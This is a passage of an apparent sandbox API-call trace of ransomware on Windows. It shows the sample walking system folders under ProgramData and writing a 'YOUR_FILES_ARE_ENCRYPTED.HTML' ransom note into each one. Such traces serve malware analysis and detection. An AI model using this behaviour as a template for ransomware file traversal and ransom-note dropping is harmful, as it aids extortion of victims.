dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0109.979] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7e546a, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae7e546a, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae7ea267, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.979] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7e546a, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae7e546a, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae7ea267, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.979] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0109.979] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MapData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0109.979] GetProcessHeap () returned 0x600000 [0109.979] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0109.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MapData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\mapdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.979] GetProcessHeap () returned 0x600000 [0109.979] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0109.980] GetProcessHeap () returned 0x600000 [0109.980] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0109.980] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x35da50f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="MF", cAlternateFileName="")) returned 1 [0109.980] StrStrIW (lpFirst="MF", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.980] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF") returned 35 [0109.980] GetProcessHeap () returned 0x600000 [0109.980] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0109.981] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF" [0109.981] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*" [0109.981] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae7f3ed1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626778 [0109.982] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae7f3ed1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0109.982] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Active.GRL", cAlternateFileName="")) returned 1 [0109.982] StrStrIW (lpFirst="Active.GRL", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.982] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL") returned 46 [0109.982] PathFindExtensionW (pszPath="Active.GRL") returned=".GRL" [0109.982] lstrlenW (lpString=".GRL") returned 4 [0109.982] PathFindExtensionW (pszPath="Active.GRL") returned=".GRL" [0109.982] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Pending.GRL", cAlternateFileName="")) returned 1 [0109.982] StrStrIW (lpFirst="Pending.GRL", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.982] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL") returned 47 [0109.982] PathFindExtensionW (pszPath="Pending.GRL") returned=".GRL" [0109.982] lstrlenW (lpString=".GRL") returned 4 [0109.983] PathFindExtensionW (pszPath="Pending.GRL") returned=".GRL" [0109.983] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7f3ed1, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae7f3ed1, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae7fc8fb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.983] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7f3ed1, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae7f3ed1, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae7fc8fb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.983] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0109.983] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0109.983] GetProcessHeap () returned 0x600000 [0109.983] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0109.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\mf\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.983] GetProcessHeap () returned 0x600000 [0109.983] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0109.984] GetProcessHeap () returned 0x600000 [0109.984] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0109.984] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="NetFramework", cAlternateFileName="NETFRA~1")) returned 1 [0109.984] StrStrIW (lpFirst="NetFramework", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.984] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework") returned 45 [0109.984] GetProcessHeap () returned 0x600000 [0109.984] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0109.985] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework" [0109.985] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*" [0109.985] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae813aa5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0109.986] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae813aa5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0109.986] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 1 [0109.986] StrStrIW (lpFirst="BreadcrumbStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.986] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore") returned 61 [0109.986] GetProcessHeap () returned 0x600000 [0109.986] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.986] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore" [0109.986] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*" [0109.986] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae808b39, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c67c, dwReserved1=0x63c620, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0109.986] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae808b39, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c67c, dwReserved1=0x63c620, cFileName="..", cAlternateFileName="")) returned 1 [0109.987] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae808b39, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae808b39, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae80d8e0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c67c, dwReserved1=0x63c620, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.987] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae808b39, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae808b39, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae80d8e0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c67c, dwReserved1=0x63c620, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.987] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0109.987] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0109.987] GetProcessHeap () returned 0x600000 [0109.990] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.990] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.990] GetProcessHeap () returned 0x600000 [0109.991] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.991] GetProcessHeap () returned 0x600000 [0109.991] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.991] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae813aa5, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae813aa5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae817667, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.991] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae813aa5, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae813aa5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae817667, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.991] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0109.993] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0109.993] GetProcessHeap () returned 0x600000 [0109.993] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0109.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\netframework\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.994] GetProcessHeap () returned 0x600000 [0109.994] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0109.994] GetProcessHeap () returned 0x600000 [0109.994] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0109.995] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="Network", cAlternateFileName="")) returned 1 [0109.995] StrStrIW (lpFirst="Network", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.995] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network") returned 40 [0109.995] GetProcessHeap () returned 0x600000 [0109.995] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0109.996] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network" [0109.996] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*" [0109.996] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae842124, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626738 [0109.996] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae842124, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0109.996] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0109.996] StrStrIW (lpFirst="Connections", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.996] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections") returned 52 [0109.996] GetProcessHeap () returned 0x600000 [0109.996] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.997] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections" [0109.997] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*" [0109.997] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae824c4e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x626638 [0109.997] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae824c4e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0109.997] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae824c4e, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae824c4e, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae829a0c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.997] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae824c4e, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae824c4e, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae829a0c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.997] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0109.998] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0109.998] GetProcessHeap () returned 0x600000 [0109.998] RtlAllocateHeap 